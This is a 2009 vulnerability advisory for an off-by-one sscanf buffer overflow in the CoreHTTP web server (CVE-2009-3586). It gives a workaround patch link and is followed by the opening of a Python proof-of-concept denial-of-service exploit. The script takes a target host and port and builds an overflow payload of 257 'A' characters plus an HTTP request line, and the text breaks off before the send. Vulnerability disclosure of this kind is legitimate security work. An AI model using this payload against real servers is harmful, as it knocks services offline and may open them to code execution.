1 # bugtraq: http://seclists.org/bugtraq/2009/Dec/99
2 # census ID: census−2009−0003
3 # URL: http://census−labs.com/news/2009/12/02/corehttp−web−server/
4 # CVE ID: CVE−2009−3586
5 # Affected Products: CoreHTTP web server versions buffer,
6 # 46: "%" PATHSIZE_S "[A−Za−z] %" PATHSIZE_S "s%*[ \t\n]", req, url);
7 #
8 # The buffers req and url are declared to be of size 256 bytes (PATHSIZE)
9 # and the sscanf() call writes 256 bytes (PATHSIZE_S) to these buffers
10 # without NULL terminating them.
11 #
12 # Note that this is not vulnerability CVE−2007−4060 in which the same
13 # sscanf() call contained no bounds check at all.
14 #
15 # This vulnerability can lead to denial of service attacks against the
16 # CoreHTTP web server and potentially to the remote execution of
17 # arbitrary code with the privileges of the user running the server. We
18 # have developed a proof−of−concept exploit to demonstrate the
19 # vulnerability:
20 #
21 # http://census−labs.com/media/corex.txt
22 #
23 # For the time being, one may use the following workaround to address this
24 # issue, until an official fix is released by the author:
25 #
26 # http://census−labs.com/media/corehttp−0.5.3.1−patch.txt
27 #
28 # −−
29 #Patroklos Argyroudis
30 #http://www.census−labs.com/
31
32 #!/usr/bin/env python
33 # corex.py −− Patroklos Argyroudis, argp at domain census−labs.com
34 #
35 # Denial of service exploit for CoreHTTP web server version <= 0.5.3.1:
36 #
37 # http://cve.mitre.org/cgi−bin/cvename.cgi?name=CVE−2009−3586
38 #
39 # For a detailed analysis see:
40 #
41 # http://census−labs.com/news/2009/12/02/corehttp−web−server/
42
43 import os
44 import sys
45 import socket
46
47 def main(argv):
48 argc = len(argv)
49
50 if argc != 3:
51 print "usage: %s " % (argv[0])
52 sys.exit(0)
Page 1/2
CoreHTTP web server offbyone buffer overflow vulnerability
Patroklos Argyroudis
12/02/2009
53
54 host = argv[1]
55 port = int(argv[2])
56
57 print "[*] target: %s:%d" % (host, port)
58
59 payload = "A" * 257 + "/index.html HTTP/1.1\r\n\r\n"
60
61 print